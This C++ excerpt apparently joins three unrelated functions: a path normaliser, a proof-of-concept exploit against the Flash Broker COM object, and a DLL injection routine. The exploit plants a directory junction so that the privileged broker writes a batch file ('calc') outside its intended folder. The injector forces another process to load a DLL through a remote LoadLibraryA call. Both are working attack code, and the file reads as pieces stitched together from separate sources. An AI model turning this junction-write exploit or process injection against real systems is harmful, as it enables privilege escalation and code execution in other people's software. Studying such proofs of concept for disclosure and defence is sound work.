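// Resolves `path` against the process startup directory and returns a
// forward-slash path with "." and ".." components folded.
//
// Behaviour, as implemented:
//  * Backslashes are converted to forward slashes before anything else.
//  * A path beginning with '/' is anchored at GetPathRoot(startup) rather
//    than at the startup directory itself (leading slashes are stripped).
//  * A path whose second character is ':' (drive-qualified, e.g. "C:/x") is
//    returned after slash conversion only; it is NOT canonicalised.
//  * ".." walks up one component but is clamped at GetPathRoot(startup);
//    surplus ".." components are silently dropped. Note this clamps at the
//    ROOT, not at the startup directory: a relative input such as "../../x"
//    can still resolve above the startup directory. Callers that need the
//    result confined to the startup directory must check that themselves.
//
// Fixes over the previous version: an empty or single-character `path` no
// longer reads p[1] past the end of the string, and the find() cursor is a
// size_type instead of an int that relied on -1 wrapping back to npos.
std::string FileSystem::GetFullPath(const std::string& path) {
    std::string startup = GetStartupDirectory();
    std::string p = StringHelper::Replace(path, '\\', '/');

    if (!p.empty() && p[0] == '/') {
        // Rooted path: anchor at the root of the startup directory.
        startup = GetPathRoot(startup);
        p = StringHelper::TrimStart(p, '/');
    } else if (p.size() > 1 && p[1] == ':') {
        // Drive-qualified path: handed back without further normalisation.
        return p;
    }

    std::string::size_type slash;
    while ((slash = p.find('/')) != std::string::npos) {
        const std::string component = p.substr(0, slash);
        if (component == ".") {
            // Current directory: nothing to do.
        } else if (component == "..") {
            // Parent directory, clamped so the walk never rises above the root.
            if (GetPathRoot(startup) != startup) {
                startup = startup.substr(0, startup.find_last_of('/'));
            }
        } else {
            startup = StringHelper::TrimEnd(startup, '/') + "/" + component;
        }
        p = p.substr(slash + 1);
    }
    // Whatever is left after the last '/' is the final component (may be empty).
    return StringHelper::TrimEnd(startup, '/') + "/" + p;
}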
// Proof-of-concept: asks the 32-bit Flash Broker (CLSID below) to write a
// file through a directory junction. The junction is created under the temp
// directory and pointed at this process's startup directory, so a write the
// broker believes goes to <temp>\dummy_junction\exploit.bat actually lands in
// the startup directory if the broker checks the requested path but not where
// it resolves to.
// NOTE(review): whether the broker performs only a lexical path check is not
// visible here; confirm by observing where exploit.bat is created.
//
// Side effects: creates and removes <temp>\dummy_junction; on success writes
// the bytes "calc\r\n" to exploit.bat via BrokerWriteFile. Diagnostics go to
// DebugPrintf; nothing is returned.
void DoFlashBrokerExploitJunction() {
    CLSID brokerClsid;
    CLSIDFromString(L"{73c9dfa0-750d-11e1-b0c4-0800200c9a66}", &brokerClsid);

    IFlashBroker5* broker = nullptr;
    const HRESULT hr = CoCreateInstance(brokerClsid, nullptr,
                                        CLSCTX_LOCAL_SERVER | CLSCTX_ACTIVATE_32_BIT_SERVER,
                                        IID_PPV_ARGS(&broker));
    if (FAILED(hr)) {
        DebugPrintf("Failed to create broker: %08X\n", hr);
        return;
    }
    DebugPrintf("Created Broker: %p\n", broker);

    // The junction lives in the temp directory; a stale one left by an earlier
    // run is removed before it is recreated.
    bstr_t junctionPath = GetTempDir();
    junctionPath = junctionPath + L"dummy_junction";
    CreateDirectoryW(junctionPath, nullptr);
    FSLinks::DeleteJunctionPoint(junctionPath);

    bstr_t targetDir = GetStartupDirectory();
    if (!FSLinks::CreateJunctionPoint(junctionPath, targetDir)) {
        DebugPrintf("Failed to create junction\n");
    } else {
        // Payload excludes the terminating NUL, matching the original strlen-sized buffer.
        static const char kPayload[] = "calc\r\n";
        std::vector<unsigned char> payload(kPayload, kPayload + sizeof(kPayload) - 1);
        BrokerWriteFile(broker, junctionPath + L"\\exploit.bat", payload);
    }

    RemoveDirectoryW(junctionPath);
    broker->Release();
}
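// Injects the DLL `dllFileName` (a name relative to the startup directory)
// into process `processId` by making that process call LoadLibraryA on the
// absolute path. Returns true only if the remote LoadLibraryA ran and
// returned a non-NULL module handle.
//
// Fixes over the previous version: the path is length-checked before it is
// appended (strcat into a fixed _MAX_PATH buffer could overflow), the remote
// exit code is initialised so a failed remote call cannot be misread as a
// valid handle, a failed RemoteStrDup no longer hands NULL to the remote
// thread, and two unused locals (GetModuleHandle/GetProcAddress results,
// never referenced) are removed.
bool DebugFrontend::InjectDll(DWORD processId, const char* dllFileName) {
    if (dllFileName == nullptr) {
        return false;
    }

    // Build the absolute path: <startup dir> + dllFileName, bounded by the buffer.
    char fullFileName[_MAX_PATH];
    if (!GetStartupDirectory(fullFileName, _MAX_PATH)) {
        return false;
    }
    const size_t dirLen = strlen(fullFileName);
    const size_t nameLen = strlen(dllFileName);
    if (dirLen + nameLen >= sizeof(fullFileName)) {
        return false;  // would not fit together with the terminating NUL
    }
    memcpy(fullFileName + dirLen, dllFileName, nameLen + 1);

    // NOTE(review): PROCESS_ALL_ACCESS is broader than remote allocation,
    // write and thread creation require; a narrower mask (PROCESS_CREATE_THREAD
    // | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE |
    // PROCESS_VM_READ) would follow least privilege. The helpers below are not
    // visible here, so the original mask is kept rather than risk breaking them.
    HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, processId);
    if (process == NULL) {
        return false;
    }

    bool success = true;
    // Receives LoadLibraryA's return value as the remote thread's exit code
    // (truncated to a DWORD); it is only ever tested against NULL.
    DWORD exitCode = 0;

    char* remoteFileName = RemoteStrDup(process, fullFileName);
    if (remoteFileName == NULL) {
        success = false;
    } else if (!ExecuteRemoteKernelFuntion(process, "LoadLibraryA", remoteFileName, exitCode)) {
        success = false;
    } else if (exitCode == 0) {
        // Equivalent to reinterpret_cast<HMODULE>(exitCode) == NULL: LoadLibraryA failed remotely.
        success = false;
    }

    /*
    // Unload the DLL.
    // This is currently not needed since the process will automatically unload
    // the DLL when it exits, however at some point in the future we may need to
    // explicitly unload it so I'm leaving the code here.
    if (exitCode != 0) {
        if (!ExecuteRemoteKernelFuntion(process, "FreeLibrary", reinterpret_cast<HMODULE>(exitCode), exitCode)) {
            success = false;
        }
    }
    */

    if (remoteFileName != NULL) {
        VirtualFreeEx(process, remoteFileName, 0, MEM_RELEASE);
        remoteFileName = NULL;
    }
    CloseHandle(process);
    return success;
}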